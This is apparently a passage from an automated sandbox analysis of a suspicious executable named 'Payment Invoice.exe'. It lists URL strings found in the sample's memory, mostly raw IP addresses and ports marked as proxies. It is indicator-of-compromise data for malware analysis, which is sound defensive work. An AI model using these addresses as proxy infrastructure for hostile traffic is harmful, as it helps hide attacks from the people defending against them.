                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.71.99.233:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318605000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.146.114:5020
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.146.114:5020://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.149.34:8080://proxyH
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.149.9:5020
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.149.9:5020://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.159.34:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.159.34:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.196.168.183
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.196.168.183://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.196.168.183:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.2.52.152:8282
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.2.52.152:8282://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.28.60.64:8090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.28.60.64:8090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.29.84.133:20806
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.29.84.133:20806://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.42.71.103:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.42.71.103:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.47.90.25:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.47.90.25:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.47.90.43:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.189.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.189.194
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.189.194://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.189.194:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.189.194:8123
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.189.194:8123://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.71.27
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.71.27://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.71.27:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.71.27:8123
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.71.27:8123://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.84.215.127:3256
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.84.215.127:3256://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.91.214.119:3389
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.91.214.119:3389://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.176.231.147
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.176.231.147://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.176.231.147:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.248.41.130:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.248.41.130:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.7.109.1:9812
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.7.109.1:9812://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.197.40.219:9002
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.197.40.219:9002://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.234.203.171:9002
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.234.203.171:9002://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.24.52.179:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.24.52.179:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.26.68.107
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.26.68.107://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.26.68.107:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.29.124.131:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.29.124.131:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.37.121.209:9091
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.37.121.209:9091://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317B28000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631819C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.77.148.138:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317AE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.77.148.138:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.78.191.68
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.78.191.68://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.78.191.68:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.79.101.0:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.79.101.0:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.89.91.222:8182
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.89.91.222:8182://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.128.194.154
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.128.194.154://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.128.194.154:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.129.47.25:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.129.47.25:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.130.172.153:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.130.172.153:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.139.218.165:31409
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.139.218.165:31409://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.159.146.251
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.159.146.251://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.159.146.251:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.182.138.71
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.206.205.75:4216
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.206.205.75:4216://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.114.232.137:808
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.114.232.137:808://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.116.150
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.116.150.2:9000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.116.150.2:9000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.152.53.25:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.152.53.25:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.154.118.66:8083
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.154.118.66:8083://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.185.198.242:7999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.185.198.242:7999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.3.121.231:8082
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.3.121.231:8082://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.52.196.36:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.52.196.36:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.54.147.110:8082
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://122.54.147.110:8082://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.108.98.108:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.108.98.108:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.110.158.236
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.110.158.236://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.110.158.236:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.126.158.50
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.126.158.50://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.126.158.50:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.58.108:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163195FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.58.108:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.58.137:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.58.137:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.58.138:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.58.138:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.58.221:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.58.221:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.59.208:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.182.59.208:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.30.154.171:7777
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.30.154.171:7777://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.59.100.245:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.59.100.245:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316E0D000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.158.149.66:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.158.149.66:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.158.186.254:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.158.186.254:80800q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.158.186.254:8080://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631964E000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319ADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.160.118.183:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.160.118.183:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.163.236.54:7302
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.163.236.54:7302://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.198.74.90:26976
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.198.74.90:26976://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.222.21.124:2080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.222.21.124:2080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.141.139.60:5566
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.141.139.60:5566://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.209.88.46:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.209.88.46:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.212.231.220:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.212.231.220:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.229.149.168:65110
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.229.149.168:65110://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.25.43.147:8180
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.25.43.147:8180://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.25.82.190:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.25.82.190:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.26.183.79:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.26.183.79:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.26.4.197:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.26.4.197:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.87.82.86:3256
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.87.82.86:3256://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.87.89.228:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.87.89.228:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.87.93.81:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.87.93.81:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.99.106.250:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.99.106.250:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163184D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.7
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163184D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.7://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163184D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.7:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.104.190:41354
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.104.190:41354://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.116
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.116.34:4444
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.116.34:4444://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.131.98:18182
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.165.63:33574
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.165.63:33574://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.184.169:8000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.184.169:8000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.187.210:8000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.187.210:8000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.196
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.196.31:21049
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.196.31:21049://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.196.31:27102
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.196.31:27102://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.196.31:33661
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.196.31:33661://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.196.31:38832
